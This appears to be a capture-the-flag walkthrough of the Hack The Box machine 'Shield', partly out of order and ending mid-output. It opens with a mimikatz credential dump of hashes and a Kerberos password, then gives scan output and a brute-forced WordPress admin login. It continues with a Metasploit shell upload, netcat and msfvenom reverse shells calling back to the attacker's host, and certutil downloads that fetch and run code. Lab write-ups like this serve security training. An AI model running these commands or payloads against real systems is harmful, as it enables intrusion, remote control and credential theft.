         * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SHIELD$
Domain            : MEGACORP
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:01 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : SHIELD$
         * Domain   : MEGACORP
         * NTLM     : 9d4feee71a4f411bf92a86b523d64437
         * SHA1     : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username : SHIELD$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : shield$
         * Domain   : MEGACORP.LOCAL
         * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:08 PM
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : IUSR
         * Domain   : NT AUTHORITY
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:02 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 65711 (00000000:000100af)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:01 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : SHIELD$
         * Domain   : MEGACORP
         * NTLM     : 9d4feee71a4f411bf92a86b523d64437
         * SHA1     : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username : SHIELD$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : SHIELD$
         * Domain   : MEGACORP.LOCAL
         * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 65691 (00000000:0001009b)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:01 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : SHIELD$
         * Domain   : MEGACORP
         * NTLM     : 9d4feee71a4f411bf92a86b523d64437
         * SHA1     : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
         * Username : SHIELD$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : SHIELD$
         * Domain   : MEGACORP.LOCAL
         * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Authentication Id : 0 ; 36390 (00000000:00008e26)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:00 PM
SID               : 
        msv :
         [00000003] Primary
         * Username : SHIELD$
         * Domain   : MEGACORP
         * NTLM     : 9d4feee71a4f411bf92a86b523d64437
         * SHA1     : 0ee4dc73f1c40da71a60894eff504cc732de82da
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SHIELD$
Domain            : MEGACORP
Logon Server      : (null)
Logon Time        : 5/4/2020 10:19:00 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : SHIELD$
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : shield$
         * Domain   : MEGACORP.LOCAL
         * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&
        ssp :
        credman :

Result: Credentials Sandra:Password1234!.

PreviousOopsie NextVaccine

Last updated 2 years ago

Was this helpful?

HTB - Shield

nmap -T4 -A -p- 10.10.10.29

kali@kali:~$ nmap -T4 -A -p- 10.10.10.29
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 17:10 EDT
Nmap scan report for 10.10.10.29
Host is up (0.47s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 643.75 seconds

Nessus scan for fun Start with sudo /etc/init.d/nessusd start and go to https://kali:8834

Enumerate HTTP

Ran sudo nikto -h http://10.10.10.29

kali@kali:~$ sudo nikto -h http://10.10.10.29
[sudo] password for kali: 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.29
+ Target Hostname:    10.10.10.29
+ Target Port:        80
+ Start Time:         2020-05-04 17:16:16 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ 7863 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2020-05-04 18:12:15 (GMT-4) (3359 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
kali@kali:~$ sudo nikto -h http://10.10.10.29/wordpress
[sudo] password for kali: 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.29
+ Target Hostname:    10.10.10.29
+ Target Port:        80
+ Start Time:         2020-05-04 18:41:32 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-powered-by header: PHP/7.1.29
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with multiple values: (<http://10.10.10.29/wordpress/index.php/wp-json/>; rel="https://api.w.org/",<http://10.10.10.29/wordpress/>; rel=shortlink,)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ ERROR: Error limit (20) reached for host, giving up. Last error:                                                                                         
+ Scan terminated:  3 error(s) and 8 item(s) reported on remote host                                                                                       
+ End Time:           2020-05-04 19:11:11 (GMT-4) (1779 seconds)                                                                                           
---------------------------------------------------------------------------                                                                                
+ 1 host(s) tested

Visit http://10.10.10.29

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.29/
[+] Threads:        200
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/04 17:27:45 Starting gobuster
===============================================================
/wordpress (Status: 301)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/people: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/aboutus: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/new: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/sports: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/buttons: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/image: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/blogs: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/products: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/events: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/music: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:12 [!] Get http://10.10.10.29/474: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:12 [!] Get http://10.10.10.29/Top: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:13 [!] net/http: request canceled (Client.Timeout exceeded while reading body)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/Logos: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/infobox: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/994: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/777: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:16 [!] Get http://10.10.10.29/su: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/WordPress (Status: 301)
[ERROR] 2020/05/04 17:30:21 [!] Get http://10.10.10.29/category3: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/Wordpress (Status: 301)
===============================================================
2020/05/04 17:34:53 Finished
===============================================================

Wordpress install found at /wordpress/

Run wpscan:

wpscan --update
wpscan --url 10.10.10.29/wordpress/ --api-token 4emjktvbV4Csl9u9IVTpH5uWcnXvgwJZfWSCSlu0s3g

Output:

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.10.29/wordpress/ [10.10.10.29]
[+] Started: Mon May  4 17:38:24 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Microsoft-IIS/10.0
 |  - X-Powered-By: PHP/7.1.29
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.29/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://10.10.10.29/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.29/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.10.29/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
 |  - http://10.10.10.29/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
 |
 | [!] 18 vulnerabilities identified:
 |
 | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
 |     Fixed in: 5.2.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9867
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
 |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
 |      - https://hackerone.com/reports/339483
 |
 | [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews
 |     Fixed in: 5.2.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9864
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16219
 |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
 |      - https://fortiguard.com/zeroday/FG-VD-18-165
 |      - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9908
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9909
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
 |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9910
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9911
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation 
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9912
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9913
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9973
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9975
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://hackerone.com/reports/509930
 |      - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Block Editor Content
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9976
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
 |
 | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10004
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
 |
 | [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10201
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11027
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47634/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ww7v-jg8c-q6jw
 |
 | [!] Title: WordPress < 5.4.1 - Unauthenticated Users View Private Posts
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10202
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11028
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47635/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xhx9-759f-6p2w
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10203
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11025
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47633/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4mhg-j6fx-5g3c
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Search Block
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10204
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11030
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47636/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-vccm-6gmc-qhjh
 |
 | [!] Title: WordPress < 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10205
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11029
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47637/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-568w-8m88-8g2c
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10206
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11026
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47638/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-3gw2-4656-pfr2

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mesmerize-companion
 | Location: http://10.10.10.29/wordpress/wp-content/plugins/mesmerize-companion/
 | Latest Version: 1.6.111
 | Last Updated: 2020-04-10T15:01:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | The version could not be determined.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:04 <==============================================================================> (21 / 21) 100.00% Time: 00:00:04

[i] No Config Backups Found.

[+] WPVulnDB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 48

[+] Finished: Mon May  4 17:38:40 2020
[+] Requests Done: 27
[+] Cached Requests: 36
[+] Data Sent: 6.36 KB
[+] Data Received: 18.56 KB
[+] Memory used: 175.391 MB
[+] Elapsed time: 00:00:15

Enumerate Users: wpscan --url 10.10.10.29/wordpress/ --enumerate u

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:30 <=============================================================================> (10 / 10) 100.00% Time: 00:00:30

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.29/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Bruteforce login: wpscan --url 10.10.10.29/wordpress/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin --max-threads 50 --api-token 4emjktvbV4Csl9u9IVTpH5uWcnXvgwJZfWSCSlu0s3g
Login found to be admin:P@s5w0rd! from last box. Go to http://10.10.10.29/wordpress/wp-login.php and login.
Searching for metasploit wordpress yields https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload

Exploit

sudo msfconsole
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf > set PASSWORD P@s5w0rd!
msf > set USERNAME admin
msf > set TARGETURI /wordpress
msf > set RHOSTS 10.10.10.29
msf > set LPORT 443
msf > set payload php/meterpreter_reverse_tcp
msf > exploit

Upgrade to more stable shell:

wget https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip
untar netcat-win32-1.12.zip
msf > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
sudo python3 -m http.server 80
msf > shell
> iwr -outf nc.exe http://10.10.14.173/nc.exe
nc -lvp 1234
msf > execute -f nc.exe -a "-e cmd.exe 10.10.14.173 1234"

2nd way to upgrade (much better):
1. Change paylaod to download and execute
  set payload php/download_exec msf > set url http://10.10.14.173/shell.exe
2. Create exploit: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.173 LPORT=443 -f exe > shell.exe
3. Run server: sudo python3 -m http.server 80
4. Open up port to listen on:
  use exploit/multi/handler set payload windows/meterpreter/reverse_tcp options set LHOST 10.10.15.117 set LPORT 443 run

Sysinfo:

sysinfo
Computer    : SHIELD
OS          : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586
Meterpreter : php/windows

Privilege Escalation ()

Find exploit:

Method 1: Priv esc suggester

search suggester
use 0
options
set session 1
run

Result:

0.29 - Collecting local exploits for x86/windows...
[*] 10.10.10.29 - 30 exploit checks are being tried...
[+] 10.10.10.29 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.29 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.29 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed

Result: I tried ms16_032_secondary_logon_handle_privesc with x64 meterpreter after changing to x64 shell from 32 bit but did not work.

Method 2: Search for windows server 2016 privilege escalation exploit yields https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#juicy-potato-abusing-the-golden-privileges which points to

Method 3: More automated searchers. ** by rastamouse

sudo python3 -m http.server 80
msf shell > certutil -urlcache -f http://10.10.15.117/sher.ps1 sher.ps1
msf shell > powershell.exe -exec bypass -Command "& {Import-Module .\sher.ps1; Find-AllVulns}"

Output:

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Not Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
             6-034?
VulnStatus : Not Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
             ample-Exploits/MS16-135
